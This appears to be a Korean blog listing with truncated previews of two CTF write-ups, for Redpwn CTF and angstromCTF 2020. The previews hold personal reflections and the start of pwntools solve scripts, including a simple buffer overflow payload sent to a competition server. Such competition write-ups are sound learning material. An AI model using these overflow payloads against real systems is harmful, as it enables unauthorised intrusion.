CTF
Redpwn CTF
작년에 재미있게 했던 기억이 있어서 올해에도 빠지지 않고 참여했습니다. 기말시험이나 BoB최종 발표랑 겹쳐서 많이 투자하지는 못했지만 올해도 재밌었습니다. 특히, 작년에 비해 서버가 괜찮았습니다. 작년에는 펑펑 터지던거로 기억하고있어서... 내년에는 좀 더 높은 등수를 노릴 수 있도록 더욱 노력하겠습니다. SOLVED Pwnable coffer-overflow-0 from pwn import * p=remote("2020.redpwnc.tf", 31199) py = 'A'*28 p.sendlineafter("with?",py) p.interactive() coffer-overflow-1 from pwn import * p=remote("2020.redpwnc.tf",31255) py = '' py = '..
angstormCTF 2020
토/일 요일에는 최대한 잡고 월요일에는 못 풀던 문제를 조금 건들면서 진행했다. 여러모로 많이 부족한것을 느꼈다. 점 점 증진해야겠다. SOLVED MISC ws1 hxd로 문제 파일 열면 ctf가 그대로 박혀있다. shifter nc에 접속하면 무작위 문자열과 n 값 하나를 주는데 n을 피보나치수열로 바꾸고 값만큼 문자열을 이동하면 된다. 재귀 함수로는 40부터 시간제한에 걸려서 40~49까지 구한 값을 직접 넣어주었다. from pwn import * context.log_level = 'debug' p=remote("misc.2020.chall.actf.co",20300) def caesar(s,n): s=list(s) for i in range(len(s)): if s[i].isupper():..